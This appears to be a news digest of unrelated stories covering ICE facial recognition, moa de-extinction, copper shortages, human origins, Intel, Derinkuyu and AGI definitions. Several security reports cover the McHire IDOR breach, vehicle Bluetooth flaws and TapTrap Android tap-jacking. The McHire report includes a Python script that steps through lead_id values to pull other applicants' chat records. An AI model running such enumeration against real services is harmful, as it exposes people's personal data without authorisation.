Juan Carlos Lopez-Gomez, despite his U.S. citizenship and Social Security card, was arrested on April 16 on the unfounded suspicion that he was an "unauthorized alien." Immigration and Customs Enforcement kept him in county jail for 30 hours "based on biometric confirmation of his identity"—an obvious mistake of facial recognition technology. Another U.S. citizen, Jensy Machado, was held at gunpoint and handcuffed by ICE agents, another victim of mistaken identity after someone else gave his home address on a deportation order. This is the reality of immigration policing in 2025: Arrest first, verify later.
That risk only grows as ICE shreds due process safeguards and immigration policing agencies increasingly embrace error-prone technology, especially facial recognition, leaving citizens and noncitizens alike facing growing threats from mistaken identity. Last month, it was revealed that Customs and Border Protection requested pitches from tech firms to expand its use of an especially error-prone facial recognition technology—the same kind of technology wrongly used to arrest and jail Lopez-Gomez. ICE already has nearly $9 million in contracts with Clearview AI, a facial recognition company with white nationalist ties that was at one point the private facial recognition system most used by federal agencies. When reckless policing is combined with powerful and inaccurate dragnet tools, the result will inevitably be more stories like Lopez-Gomez's and Machado's.
Studies have shown that facial recognition technology is disproportionately likely to misidentify people of color, especially Black women. And with the recent rapid increase in ICE activity, facial recognition risks arbitrarily sweeping more and more people into ICE's dragnet without the due process rights needed to prove their legal standing. Even for American citizens who have "nothing to hide," simply looking like the wrong person can get you jailed or even deported.
While facial recognition's mistakes are dangerous, its potential for abuse when working as intended is even scarier. For example, facial recognition lets Donald Trump use ICE as a more powerful weapon for retribution. The president himself admits he's using immigration enforcement to target people for their political opinions and that he seeks to deport people regardless of citizenship. In the context of a presidential administration that is uncommonly willing to ignore legal procedures and judicial orders, a perfectly accurate facial recognition system could be the most dangerous possibility of all: Federal agents could use facial recognition on photos and footage of protests to identify each of the president's perceived enemies, who could then be arrested and even deported without due process rights.
And the more facial recognition technology expands across our daily lives, the more dangerous it becomes. By working with local law enforcement and private companies, including by sharing facial recognition technology, ICE is growing its ability to round people up—beyond what it already can do. This deputization of surveillance infrastructure comes in many forms: Local police departments integrate facial recognition into their body cameras, landlords use facial recognition instead of a key to admit or deny tenants, and stadiums use facial recognition for security. Even New York public schools used facial recognition on their security camera footage until a recent moratorium. Across the country, other states and municipalities have imposed regulations on facial recognition in general, including Boston, San Francisco, Portland, and Vermont. Bans on the technology in schools specifically have been passed in Florida and await the governor's signature in Colorado. Any facial recognition, no matter its intended use, is at inherent risk of being handed over to ICE for indiscriminate or politically retaliatory deportations.
Arthur T Knackerbracket has processed the following story:
Colossal Biosciences has announced plans to “de-extinct” the New Zealand moa, one of the world’s largest and most iconic extinct birds, but critics say the company’s goals remain scientifically impossible.
The moa was the only known completely wingless bird, lacking even the vestigial wings of birds like emus. There were once nine species of moa in New Zealand, ranging from the turkey-sized bush moa (Anomalopteryx didiformis) to the two biggest species, the South Island giant moa (Dinornis robustus) and North Island giant moa (Dinornis novaezealandiae), which both reached heights of 3.6 metres and weights of 230 kilograms.
It is thought that all moa species were hunted to extinction by the mid-15th century, following the arrival of Polynesian people, now known as Māori, to New Zealand sometime around 1300.
Colossal has announced that it will work with the Indigenous Ngāi Tahu Research Centre, based at the University of Canterbury in New Zealand, along with film-maker Peter Jackson and Canterbury Museum, which holds the largest collection of moa remains in the world. These remains will play a key role in the project, as Colossal aims to extract DNA to sequence and rebuild the genomes for all nine moa species.
As with Colossal’s other “de-extinction” projects, the work will involve modifying the genomes of animals still living today. Andrew Pask at the University of Melbourne, Australia, who is a scientific adviser to Colossal, says that although the moa’s closest living relatives are the tinamou species from Central and South America, they are comparatively small.
This means the project will probably rely on the much larger Australian emu (Dromaius novaehollandiae). “What emus have is very large embryos, very large eggs,” says Pask. “And that’s one of the things that you definitely need to de-extinct a moa.”
[...] But Philip Seddon at the University of Otago, New Zealand, says that whatever Colossal produces, it won’t be a moa, but rather a “possible look-alike with some very different features”. He points out that although the tinamou is the moa’s closest relative, the two diverged 60 million years ago.
“The bottom line is that Colossal’s approach to de-extinction uses genetic engineering to alter a near-relative of an extinct species to create a GMO [genetically-modified organism] that resembles the extinct form,” he says. “There is nothing much to do with solving the global extinction crisis and more to do with generating fundraising media coverage.”
Pask strongly disputes this sentiment and says the knowledge being gained through de-extinction projects will be critically important to helping save endangered species today.
"They may superficially have some moa traits, but are unlikely to behave as moa did or be able to occupy the same ecological niches, which will perhaps relegate them to no more than objects of curiosity," says Wood.
Sir Peter Jackson backs project to de-extinct moa, experts cast doubt:
A new project backed by film-maker Sir Peter Jackson aims to bring the extinct South Island giant moa back to life in less than eight years.
The South Island giant moa stood up to 3.6 metres tall, weighed around 230kg and typically lived in forests and shrubbery.
Moa hatchlings could be a reality within a decade, says the company behind the project.
Using advanced genetic engineering, iwi Ngāi Tahu, Canterbury Museum, and US biotech firm Colossal Biosciences plan to extract DNA from preserved moa remains to recreate the towering flightless bird.
However, Zoology Professor Emeritus Philip Seddon from the University of Otago is sceptical.
"Extinction really is forever. There is no current genetic engineering pathway that can truly restore a lost species, especially one missing from its ecological and evolutionary context for hundreds of years," he told the Science Media Centre.
He said a five to 10-year timeframe for the project provided enough leeway to "drip feed news of genetically modifying some near relative of the moa".
"Any end result will not, cannot be, a moa - a unique treasure created through millenia of adaptation and change. Moa are extinct. Genetic tinkering with the fundamental features of a different life force will not bring moa back."
University of Otago Palaeogenetics Laboratory director Dr Nic Rawlence is also not convinced the country will see the massive flightless bird making a comeback.
He said the project came across as "very glossy" but scientifically the ambition was "a pipedream".
"The technology isn't available yet. It definitely won't be done in five to 10 years ... but also they won't be de-extincting a moa, they'll be creating a genetically engineered emu."
It might look like a moa but it was really "a smokescreen", he told Midday Report.
'123456' Password Exposed Chats for 64 Million McDonald's Job Applicants:
Cybersecurity researchers discovered a vulnerability in McHire, McDonald's chatbot job application platform, that exposed the chats of more than 64 million job applicants across the United States.
The flaw was discovered by security researchers Ian Carroll and Sam Curry, who found that the chatbot's admin panel included a test franchise protected by weak default credentials: a login name of "123456" and a password of "123456".
McHire, powered by Paradox.ai and used by about 90% of McDonald's franchisees, accepts job applications through a chatbot named Olivia. Applicants can submit names, email addresses, phone numbers, home addresses, and availability, and are required to complete a personality test as part of the job application process.
Once logged in, the researchers submitted a job application to the test franchise to see how the process worked.
During this test, they noticed that HTTP requests were sent to an API endpoint at /api/lead/cem-xhr with a lead_id parameter, which in their case was 64,185,742.
The researchers found that by incrementing and decrementing the lead_id parameter, they were able to expose the full chat transcripts, session tokens, and personal data of real job applicants that previously applied on McHire.
This type of flaw is called an IDOR (Insecure Direct Object Reference) vulnerability, which is when an application exposes internal object identifiers, such as record numbers, without verifying whether the user is actually authorized to access the data.
"During a cursory security review of a few hours, we identified two serious issues: the McHire administration interface for restaurant owners accepted the default credentials 123456:123456, and an insecure direct object reference (IDOR) on an internal API allowed us to access any contacts and chats we wanted," Carroll explained in a writeup about the flaw.
"Together they allowed us and anyone else with a McHire account and access to any inbox to retrieve the personal data of more than 64 million applicants."
In this case, incrementing or decrementing a lead_id number in a request returned sensitive data belonging to other applicants, as the API failed to check if the user had access to the data.
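As a rough sketch of what such an IDOR probe looks like in practice, the Python below steps a numeric identifier up and down against an endpoint. The endpoint path and the researchers' starting lead_id come from the write-up; the host, session handling, and response format are placeholders, not the real McHire API.

```python
import requests

# Hypothetical illustration of an IDOR probe. The base URL, session cookie, and
# response shape below are placeholders for illustration only.
BASE_URL = "https://mchire.example.test"            # placeholder host
SESSION = {"Cookie": "session=TEST_SESSION_TOKEN"}  # any valid low-privilege session

def fetch_lead(lead_id):
    """Request a chat record by its numeric identifier."""
    resp = requests.get(
        f"{BASE_URL}/api/lead/cem-xhr",
        params={"lead_id": lead_id},
        headers=SESSION,
        timeout=10,
    )
    return resp.json() if resp.ok else None

# The flaw: nothing ties lead_id to the logged-in user, so simply stepping the
# number up or down returns other applicants' transcripts and personal data.
start_id = 64_185_742  # the researchers' own application
for lead_id in range(start_id - 3, start_id + 3):
    record = fetch_lead(lead_id)
    if record:
        # A correctly authorized API would return 403 for IDs that are not yours.
        print(lead_id, "->", record)
```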
The issue was reported to Paradox.ai and McDonald's on June 30.
McDonald's acknowledged the report within an hour, and the default admin credentials were disabled soon after.
Arthur T Knackerbracket has processed the following story:
Climate change could pose a threat to the technology industry as copper production is vulnerable to drought, while demand may grow to outstrip supply anyway.
According to a report out today from PricewaterhouseCoopers (PwC), copper mines require a steady water supply to function, and many are situated in places around the world that face a growing risk of severe drought due to shifts in climate.
Copper is almost ubiquitous in IT hardware because of its excellent electrical conductivity, from the tracks on circuit boards to cabling and even the interconnects on microchips. PwC's report focuses just on chips, and claims that nearly a third (32 percent) of global semiconductor production will be reliant on copper supplies that are at risk from climate disruption by 2035.
If something is not done to rein in climate change, like drastically cutting greenhouse gas emissions, then the share of copper supply at risk rises to 58 percent by 2050, PwC claims. As this seems increasingly unlikely, it advises both copper exporters and semiconductor buyers to adapt their supply chains and practices if they are to ride out the risk.
Currently, of the countries or territories that supply the semiconductor industry with copper, the report states that only Chile faces severe drought risks. But within a decade, copper mines in the majority of the 17 countries that source the metal will be facing severe drought risks.
PwC says there is an urgent need to strengthen supply chain resilience. Some businesses are taking action, but many investors believe companies should step up their efforts when it comes to de-risking their supply chain, the firm adds.
According to the report, mining companies can alleviate some of the supply issues by investing in desalination plants, improving water efficiency and recycling water.
Semiconductor makers could use alternative materials, diversify their suppliers, and adopt measures such as recycling and taking advantage of the circular economy.
[...] This was backed up recently by the International Energy Agency (IEA), which reckons supplies of copper will fall 30 percent short of the volume required by 2035 if nothing is done to open up new sources.
One solution is for developed countries to do more refining of copper – plus other key metals needed for industry – and form partnerships with developing countries to help open up supplies, executive director Fatih Birol told The Guardian.
Arthur T Knackerbracket has processed the following story:
Humans come from Africa. This wasn’t always obvious, but today it seems as close to certain as anything about our origins.
There are two senses in which this is true. The oldest known hominins, creatures more closely related to us than to great apes, are all from Africa, going back as far as 7 million years ago. And the oldest known examples of our species, Homo sapiens, are also from Africa.
It’s the second story I’m focusing on here, the origin of modern humans in Africa and their subsequent expansion all around the world. With the advent of DNA sequencing in the second half of the 20th century, it became possible to compare the DNA of people from different populations. This revealed that African peoples have the most variety in their genomes, while all non-African peoples are relatively similar at the genetic level (no matter how superficially different we might appear in terms of skin colour and so forth).
In genetic terms, this is what we might call a dead giveaway. It tells us that Africa was our homeland and that it was populated by a diverse group of people – and that everyone who isn’t African is descended from a small subset of the peoples, who left this homeland to wander the globe. Geneticists were confident about this as early as 1995, and the evidence has only accumulated since.
And yet, the physical archaeology and the genetics don’t match – at least, not on the face of it.
Genetics tells us that all living non-African peoples are descended from a small group that left the continent around 50,000 years ago. Barring some wobbles about the exact date, that has been clear for two decades. But archaeologists can point to a great many instances of modern humans living outside Africa much earlier than that.
What is going on? Is our wealth of genetic data somehow misleading us? Or is it true that we are all descended from that last big migration – and the older bones represent populations that didn’t survive?
Eleanor Scerri at the Max Planck Institute of Geoanthropology in Germany and her colleagues have tried to find an explanation.
The team was discussing where modern humans lived in Africa. “Were humans simply moving into contiguous regions of African grasslands, or were they living in very different environments?” says Scerri.
To answer that, they needed a lot of data.
“We started with looking at all of the archaeological sites in Africa that date to 120,000 years ago to 14,000 years ago,” says Emily Yuko Hallett at Loyola University Chicago in Illinois. She and her colleagues built a database of sites and then determined the climates at specific places and times: “It was going through hundreds and hundreds of archaeological site reports and publications.”
There was an obvious shift around 70,000 years ago. “Even if you just look at the data without any fancy modelling, you do see that there is this change in the conditions,” says Andrea Manica at the University of Cambridge, UK. The range of temperatures and rainfalls where humans were living expanded significantly. “They start getting into the deeper forests, the drier deserts.”
However, it wasn’t enough to just eyeball the data. The archaeological record is incomplete, and biased in many ways.
“In some areas, you have no sites,” says Michela Leonardi at the Natural History Museum in London – but that could be because nothing has been preserved, not because humans were absent. “And for more recent periods, you have more data just because it’s more recent, so it’s easier for it to be conserved.”
Leonardi had developed a statistical modelling technique that could determine whether animals had changed their environmental niche: that is, whether they had started living under different climatic conditions or in a different type of habitat like a rainforest instead of a grassland. The team figured that applying this to the human archaeological record would be a two-week job, says Leonardi. “That was five and a half years ago.”
However, the statistics eventually did confirm what they initially saw: about 70,000 years ago, modern humans in Africa started living in a much wider range of environments. The team published their results on 18 June.
“What we’re seeing at 70,000 [years ago] is almost kind of our species becoming the ultimate generalist,” says Manica. From this time forwards, modern humans moved into an ever-greater range of habitats.
It would be easy to misunderstand this. The team absolutely isn’t saying that earlier H. sapiens weren’t adaptable. On the contrary: one of the things that has emerged from the study of extinct hominins is that the lineage that led to us became increasingly adaptable as time went on.
“People are in different environments from an early stage,” says Scerri. “We know they’re in mangrove forests, they’re in rainforest, they’re in the edges of deserts. They’re going up into highland regions in places like Ethiopia.”
This adaptability seems to be how early Homo survived environmental changes in Africa, while our Paranthropus cousins didn’t: Paranthropus was too committed to a particular lifestyle and was unable to change.
Instead, what seems to have happened in our species 70,000 years ago is that this existing adaptability was turned up to 11.
Some of this isn’t obvious until you consider just how diverse habitats are. “People have an understanding that there’s one type of desert, one type of rainforest,” says Scerri. “There aren’t. There are many different types. There’s lowland rainforest, montane rainforest, swamp forest, seasonally inundated forest.” The same kind of range is seen in deserts.
Earlier H. sapiens groups were “not exploiting the full range of potential habitats available to them”, says Scerri. “Suddenly, we see the beginnings of that around 70,000 years ago, where they’re exploiting more types of woodland, more types of rainforest.”
This success story struck me, because recently I’ve been thinking about the opposite.
Last week, I published a story about local human extinctions: groups of H. sapiens that seem to have died out without leaving any trace in modern populations. I focused on some of the first modern humans to enter Europe after leaving Africa, who seem to have struggled with the cold climate and unfamiliar habitats, and ultimately succumbed. These lost groups fascinated me: why did they fail, when another group that entered Europe just a few thousand years later succeeded so enormously?
The finding that humans in Africa expanded their niche from 70,000 years ago seems to offer a partial explanation. If these later groups were more adaptable, that would have given them a better chance of coping with the unfamiliar habitats of northern Europe – and for that matter, South-East Asia, Australia and the Americas, where their descendants would ultimately travel.
One quick note of caution: this doesn’t mean that from 70,000 years ago, human populations were indestructible. “It’s not like all humans suddenly developed into some massive success stories,” says Scerri. “Many of these populations died out, within and beyond Africa.”
And like all the best findings, the study raises as many questions as it answers. In particular: how and why did modern humans become more adaptable 70,000 years ago?
Manica points out that we can also see a shift in the shapes of our skeletons. Older fossils classed as H. sapiens don’t have all the features we associate with humans today, just some of them. “From 70,000 [years ago] onwards, roughly speaking, suddenly you see all these traits present as a package,” he says.
Upstart has processed the following story:
PerfektBlue Bluetooth Vulnerabilities Expose Millions of Vehicles to Remote Code Execution:
Cybersecurity researchers have discovered a set of four security flaws in OpenSynergy's BlueSDK Bluetooth stack that, if successfully exploited, could allow remote code execution on millions of transport vehicles from different vendors.
The vulnerabilities, dubbed PerfektBlue, can be chained together into an exploit to run arbitrary code on cars from at least three major automakers, Mercedes-Benz, Volkswagen, and Skoda, according to PCA Cyber Security (formerly PCAutomotive). Outside of these three, a fourth unnamed original equipment manufacturer (OEM) has been confirmed to be affected as well.
"PerfektBlue exploitation attack is a set of critical memory corruption and logical vulnerabilities found in OpenSynergy BlueSDK Bluetooth stack that can be chained together to obtain Remote Code Execution (RCE)," the cybersecurity company said.
While infotainment systems are often seen as isolated from critical vehicle controls, in practice, this separation depends heavily on how each automaker designs internal network segmentation. In some cases, weak isolation allows attackers to use IVI access as a springboard into more sensitive zones—especially if the system lacks gateway-level enforcement or secure communication protocols.
The only requirement to pull off the attack is that the bad actor needs to be within range and be able to pair their setup with the target vehicle's infotainment system over Bluetooth. It essentially amounts to a one-click attack to trigger over-the-air exploitation.
"However, this limitation is implementation-specific due to the framework nature of BlueSDK," PCA Cyber Security added. "Thus, the pairing process might look different between various devices: limited/unlimited number of pairing requests, presence/absence of user interaction, or pairing might be disabled completely."
The list of identified vulnerabilities is as follows -
- CVE-2024-45434 (CVSS score: 8.0) - Use-After-Free in AVRCP service
- CVE-2024-45431 (CVSS score: 3.5) - Improper validation of an L2CAP channel's remote CID
- CVE-2024-45433 (CVSS score: 5.7) - Incorrect function termination in RFCOMM
- CVE-2024-45432 (CVSS score: 5.7) - Function call with incorrect parameter in RFCOMM
Successfully obtaining code execution on the In-Vehicle Infotainment (IVI) system enables an attacker to track GPS coordinates, record audio, access contact lists, and even perform lateral movement to other systems and potentially take control of critical software functions of the car, such as the engine.
Following responsible disclosure in May 2024, patches were rolled out in September 2024.
"PerfektBlue allows an attacker to achieve remote code execution on a vulnerable device," PCA Cyber Security said. "Consider it as an entrypoint to the targeted system which is critical. Speaking about vehicles, it's an IVI system. Further lateral movement within a vehicle depends on its architecture and might involve additional vulnerabilities."
Earlier this April, the company presented a series of vulnerabilities that could be exploited to remotely break into a Nissan Leaf electric vehicle and take control of critical functions. The findings were presented at the Black Hat Asia conference held in Singapore.
"Our approach began by exploiting weaknesses in Bluetooth to infiltrate the internal network, followed by bypassing the secure boot process to escalate access," it said.
"Establishing a command-and-control (C2) channel over DNS allowed us to maintain a covert, persistent link with the vehicle, enabling full remote control. By compromising an independent communication CPU, we could interface directly with the CAN bus, which governs critical body elements, including mirrors, wipers, door locks, and even the steering."
CAN, short for Controller Area Network, is a communication protocol mainly used in vehicles and industrial systems to facilitate communication between multiple electronic control units (ECUs). Should an attacker with physical access to the car be able to tap into it, the scenario opens the door for injection attacks and impersonation of trusted devices.
"One notorious example involves a small electronic device hidden inside an innocuous object (like a portable speaker)," the Hungarian company said. "Thieves covertly plug this device into an exposed CAN wiring junction on the car."
"Once connected to the car's CAN bus, the rogue device mimics the messages of an authorized ECU. It floods the bus with a burst of CAN messages declaring 'a valid key is present' or instructing specific actions like unlocking the doors."
In a report published late last month, Pen Test Partners revealed it turned a 2016 Renault Clio into a Mario Kart controller by intercepting CAN bus data to gain control of the car and mapping its steering, brake, and throttle signals to a Python-based game controller.
Arthur T Knackerbracket has processed the following story:
Intel CEO Says It's "Too Late" for Them to Catch Up With AI Competition - Reportedly Claims Intel Has Fallen Out of the "Top 10 Semiconductor Companies" as the Firm Lays Off Thousands Across the World
Dark days ahead, or perhaps already here.
Intel has been in a dire state these past few years, with seemingly nothing going right. Its attempt to modernize x86 with a hybrid big.LITTLE architecture, à la ARM, failed to make a meaningful impact in terms of market share gains, only made worse by last-gen's Arrow Lake chips barely registering a response against AMD’s lineup. On the GPU front, the Blue Team served an undercooked product far too late that, while not entirely hopeless, was nowhere near enough to challenge the industry’s dominant players. All of this compounds into a grim reality, seemingly confirmed by new CEO Lip-Bu Tan in a leaked internal conversation today.
According to OregonTech, it's borderline a fight for survival for the once-great American innovation powerhouse, which can no longer even claim a place among the top contenders. Despite Tan's insistence, Intel would still rank fairly well given its extensive legacy. While companies like AMD, Nvidia, Apple, TSMC, and even Samsung might be more successful today, smaller chipmakers like Broadcom, MediaTek, Micron, and SK Hynix are not above the Blue Team in terms of sheer impact. Regardless, talking to employees around the world in a Q&A session, Intel's CEO allegedly shared these bleak words: "Twenty, 30 years ago, we were really the leader. Now I think the world has changed. We are not in the top 10 semiconductor companies."
As evident from the quote, this is a far cry from a few decades ago when Intel essentially held a monopoly over the CPU market, making barely perceptible upgrades each generation in order to sustain its dominance. At one time, Intel was so powerful that it considered acquiring Nvidia for $20 billion. The GPU maker is now worth $4 trillion.
It never saw AMD as an honorable competitor until it was too late, and Ryzen pulled the rug out from under the Blue Team's feet. Now, more people choose to build an AMD system than ever before. Not only that, but AMD also powers your favorite handhelds, like the Steam Deck and ROG Ally X, alongside the biggest consoles: the Xbox Series and PlayStation 5. AMD works closely with TSMC, another of Intel's competitors, whereas Intel makes its own chips in-house.
This vertical integration was once a core strength for the firm, but it has turned into more of a liability these days. Faltering nodes that can't quite match the prowess of Taiwan have arguably held back Intel's processors from reaching their full potential. In fact, starting in 2023, the company tasked TSMC with manufacturing the GPU tile on its Meteor Lake chips. The partnership extended to TSMC making essentially the entire compute tile for Lunar Lake—and now, in 2025, roughly 30% of fabrication has been outsourced to TSMC. It is a long-overdue admission of a failure that might have been avoided had Intel designed its leading-edge CPUs with external manufacturing in mind from the start; ultimately, its own foundry was the limiting factor.
As such, Intel has been laying off thousands across the world in a bid to cut costs. Costs have skyrocketed due to high R&D spending for future nodes, and the company posted a $16 billion loss in Q3 last year. Intel's resurrection has to be a "marathon," said Tan, as he hopes to turn around the company culture and "be humble" in listening to the shifting demands of the industry. Intel wants to be more like AMD and Nvidia, which are faster, meaner, and more ruthless competitors these days, especially with the advent of AI. Of course, artificial intelligence has been around for a while, but it wasn't until OpenAI's ChatGPT that a second big bang occurred, ushering in a new era of machine learning. An era almost entirely powered by Nvidia's data center GPUs, highlighting another sector where Intel failed to capitalize on its position.
"On training, I think it is too late for us," Lip-Bu Tan remarked. Intel instead plans to shift its focus toward edge AI, aiming to bring AI processing directly to devices like PCs rather than relying on cloud-based compute. Tan also highlighted agentic AI—an emerging field where AI systems can act autonomously without constant human input—as a key growth area. He expressed optimism that recent high-level hires could help steer Intel back into relevance in AI, hinting that more talent acquisitions are on the way. “Stay tuned. A few more people are coming on board,” said Tan. At this point, Nvidia is simply too far ahead to catch up to, so it's almost exciting to see Intel change gears and look to close the gap in a different way.
That being said, Intel now lags behind in data center CPUs, too, where AMD's EPYC lineup has overtaken it in the past year, further denting the company's confidence. Additionally, last year, Intel's board forced former CEO Pat Gelsinger out of the company and replaced him with Lip-Bu Tan, who appears to have a distinctly different, more streamlined vision for the company. Instead of focusing on several different facets, such as CPU, GPU, foundry, and more, all at once, Tan wants to home in on what the company can do well at any one time.
This development follows long-standing rumors of Intel splitting in two and forming a new foundry division that would act as an independent subsidiary, turning the main Intel into a fabless chipmaker. Both AMD and Apple, Intel's rivals in the CPU market, operate like this, and Nvidia has also always used TSMC or Samsung to build its graphics cards. It would be interesting to see the Blue Team shed some weight and move like a free animal in the biome. However, it's too early to speculate, given that 18A, Intel's proposed savior, is still a year away.
Derinkuyu: A Subterranean Marvel of Ancient Engineering:
Beneath the sun-drenched plains of Cappadocia, where otherworldly "fairy chimney" rock formations pierce the sky, lies a secret world carved into the very heart of the earth. Forget the grand pyramids or towering ziggurats; we're about to descend into Derinkuyu, an ancient metropolis swallowed by the ground, a testament to human resilience and a whisper from a forgotten past.
Imagine a civilization, facing threats we can only dimly perceive, choosing not to build up, but to delve down, creating a labyrinthine sanctuary that could shelter thousands. This isn't just an archaeological site; it's a subterranean saga etched in stone, waiting to unfold its mysteries. Its origins are somewhat debated, but the prevailing archaeological consensus points to construction likely beginning in the Phrygian period (around the 8th-7th centuries BCE). The Phrygians, an Indo-European people who established a significant kingdom in Anatolia, were known for their rock-cut architecture, and Derinkuyu bears hallmarks of their early techniques.
However, the city's expansion and more complex features likely developed over centuries, with significant contributions from later periods, particularly the Byzantine era (roughly 4th to 15th centuries CE). During this time, Cappadocia was a crucial region for early Christianity, and the need for refuge from various invasions and raids, first from Arab forces and later from the Seljuk Turks, would have spurred the further development and extensive use of these underground complexes.
The city served as a refuge during times of conflict, allowing people to escape from invaders. The underground city could accommodate up to 20,000 people, along with their livestock and supplies, making it a significant shelter during turbulent times. The city extends approximately 60 meters deep and consists of multiple levels—around 18 floors! Each level was designed for specific purposes, such as living quarters, storage rooms, and even places of worship.
The geological context is crucial here. Cappadocia's unique landscape is characterized by soft volcanic tuff, formed by ancient eruptions. This malleable rock was relatively easy to carve, yet strong enough to support the extensive network of tunnels and chambers without collapsing – a testament to the engineering acumen of its builders.
Now, let's talk about the ingenuity of the design. Derinkuyu wasn't just a series of haphazard tunnels; it was a carefully planned multi-level settlement designed for extended habitation. Key features include:
Ventilation Systems: Remarkably, the city possessed sophisticated ventilation shafts that extended down through multiple levels, ensuring a constant supply of fresh air. Some of these shafts are believed to have also served as wells.
Water Management: Evidence of wells and water storage areas highlights the critical need for a sustainable water supply during times of siege.
Defensive Measures: The massive circular stone doors, capable of sealing off corridors from the inside, are a clear indication of the city's primary function as a refuge. These "rolling stones" could weigh several tons and were designed to be moved by a small number of people from within.
Living and Communal Spaces: Excavations have revealed evidence of domestic areas, including kitchens (with soot-stained ceilings indicating fireplaces), sleeping quarters, and communal gathering spaces.
Agricultural Infrastructure: The presence of stables suggests that livestock were also brought underground, a vital consideration for long-term survival. Storage rooms for grains and other foodstuffs further underscore the self-sufficiency of the city during times of crisis.
Religious and Educational Facilities: Some levels appear to have housed areas that may have served as chapels or even rudimentary schools, indicating that life, even in hiding, continued beyond mere survival.
The connection to other underground cities in the region, such as Kaymaklı, via subterranean tunnels adds another layer of complexity to the understanding of these networks. It suggests a potentially interconnected system of refuges, allowing for communication and possibly even the movement of people between them in times of extreme danger.
The rediscovery of Derinkuyu in modern times is also an interesting chapter. It was reportedly found in 1969 by a local resident who stumbled upon a hidden entrance while renovating his house. Subsequent archaeological investigations have gradually revealed the extent and significance of this subterranean marvel.
While the precise dating and the identity of the original builders are still subjects of scholarly debate, the evidence strongly suggests a prolonged period of construction and use, adapting to the needs of successive populations facing various threats. Derinkuyu stands as a powerful example of human adaptation, resourcefulness, and the enduring need for shelter and security throughout history. It offers a unique window into a past that has stood the test of time and continues to captivate the imagination of all who encounter it.
A novel tap-jacking technique can exploit user interface animations to bypass Android's permission system and allow access to sensitive data or trick users into performing destructive actions, such as wiping the device.
Unlike traditional, overlay-based tap-jacking, TapTrap attacks work even with zero-permission apps to launch a harmless transparent activity on top of a malicious one, a behavior that remains unmitigated in Android 15 and 16.
TapTrap was developed by a team of security researchers at TU Wien and the University of Bayreuth (Philipp Beer, Marco Squarcina, Sebastian Roth, Martina Lindorfer), and will be presented next month at the USENIX Security Symposium.
However, the team has already published a technical paper that outlines the attack and a website that summarizes most of the details.
How TapTrap works
TapTrap abuses the way Android handles activity transitions with custom animations to create a visual mismatch between what the user sees and what the device actually registers.
A malicious app installed on the target device launches a sensitive system screen (permission prompt, system setting, etc.) from another app using 'startActivity()' with a custom low-opacity animation.
"The key to TapTrap is using an animation that renders the target activity nearly invisible," the researchers say on a website that explains the attack.
"This can be achieved by defining a custom animation with both the starting and ending opacity (alpha) set to a low value, such as 0.01," thus making the malicious or risky activity almost completely transparent.
"Optionally, a scale animation can be applied to zoom into a specific UI element (e.g., a permission button), making it occupy the full screen and increasing the chance the user will tap it."
Although the launched prompt receives all touch events, all the user sees is the underlying app displaying its own UI elements, because the nearly transparent screen they are actually engaging with sits on top of it.
Thinking they are interacting with the benign app, a user may tap on specific screen positions that correspond to risky actions, such as "Allow" or "Authorize" buttons on nearly invisible prompts.
A video released by the researchers demonstrates how a game app could leverage TapTrap to enable camera access for a website via Chrome browser.
To check whether TapTrap could work with applications in the Play Store, the official Android repository, the researchers analyzed close to 100,000 apps. They found that 76% of them are vulnerable to TapTrap as they include a screen ("activity") that meets the following conditions:
can be launched by another app
runs in the same task as the calling app
does not override the transition animation
does not wait for the animation to finish before reacting to user input
The researchers say that animations are enabled on the latest Android version unless the user disables them from the developer options or accessibility settings, exposing the devices to TapTrap attacks.
While developing the attack, the researchers used Android 15, the latest version at the time, but after Android 16 came out they also ran some tests on it.
Marco Squarcina told BleepingComputer that they tried TapTrap on a Google Pixel 8a running Android 16 and they can confirm that the issue remains unmitigated.
GrapheneOS, the mobile operating system focused on privacy and security, also confirmed to BleepingComputer that the latest Android 16 is vulnerable to the TapTrap technique, and announced that its next release will include a fix.
BleepingComputer has contacted Google about TapTrap, and a spokesperson said that the TapTrap problem will be mitigated in a future update:
"Android is constantly improving its existing mitigations against tap-jacking attacks. We are aware of this research and we will be addressing this issue in a future update. Google Play has policies in place to keep users safe that all developers must adhere to, and if we find that an app has violated our policies, we take appropriate action."- a Google representative told BleepingComputer.
When is an AI system intelligent enough to be called artificial general intelligence (AGI)? According to one definition reportedly agreed upon by Microsoft and OpenAI, the answer lies in economics: When AI generates $100 billion in profits. This arbitrary profit-based benchmark for AGI perfectly captures the definitional chaos plaguing the AI industry.
In fact, it may be impossible to create a universal definition of AGI, but few people with money on the line will admit it.
Over this past year, several high-profile people in the tech industry have been heralding the seemingly imminent arrival of "AGI" (i.e., within the next two years). [...] As Google DeepMind wrote in a paper on the topic: If you ask 100 AI experts to define AGI, you'll get "100 related but different definitions." [...]
This isn't just academic navel-gazing. The definition problem has real consequences for how we develop, regulate, and think about AI systems. When companies claim they're on the verge of AGI, what exactly are they claiming?
I tend to define AGI in a traditional way that hearkens back to the "general" part of its name: An AI model that can widely generalize—applying concepts to novel scenarios—and match the versatile human capability to perform unfamiliar tasks across many domains without needing to be specifically trained for them.
However, this definition immediately runs into thorny questions about what exactly constitutes "human-level" performance. Expert-level humans? Average humans? And across which tasks—should an AGI be able to perform surgery, write poetry, fix a car engine, and prove mathematical theorems, all at the level of human specialists? (Which human can do all that?) More fundamentally, the focus on human parity is itself an assumption; it's worth asking why mimicking human intelligence is the necessary yardstick at all.
The latest example of trouble resulting from this definitional confusion comes from the deteriorating relationship between Microsoft and OpenAI. According to The Wall Street Journal, the two companies are now locked in acrimonious negotiations partly because they can't agree on what AGI even means—despite having baked the term into a contract worth over $13 billion.
[...] For decades, the Turing Test served as the de facto benchmark for machine intelligence. [...] But the Turing Test has shown its age. Modern language models can pass some limited versions of the test not because they "think" like humans, but because they're exceptionally capable at creating highly plausible human-sounding outputs.
Perhaps the most systematic attempt to bring order to this chaos comes from Google DeepMind, which in July 2024 proposed a framework with five levels of AGI performance: emerging, competent, expert, virtuoso, and superhuman. DeepMind researchers argued that no level beyond "emerging AGI" existed at that time. Under their system, today's most capable LLMs and simulated reasoning models still qualify as "emerging AGI"—equal to or somewhat better than an unskilled human at various tasks.
But this framework has its critics. Heidy Khlaaf, chief AI scientist at the nonprofit AI Now Institute, told TechCrunch that she thinks the concept of AGI is too ill-defined to be "rigorously evaluated scientifically." In fact, with so many varied definitions at play, one could argue that the term AGI has become technically meaningless.
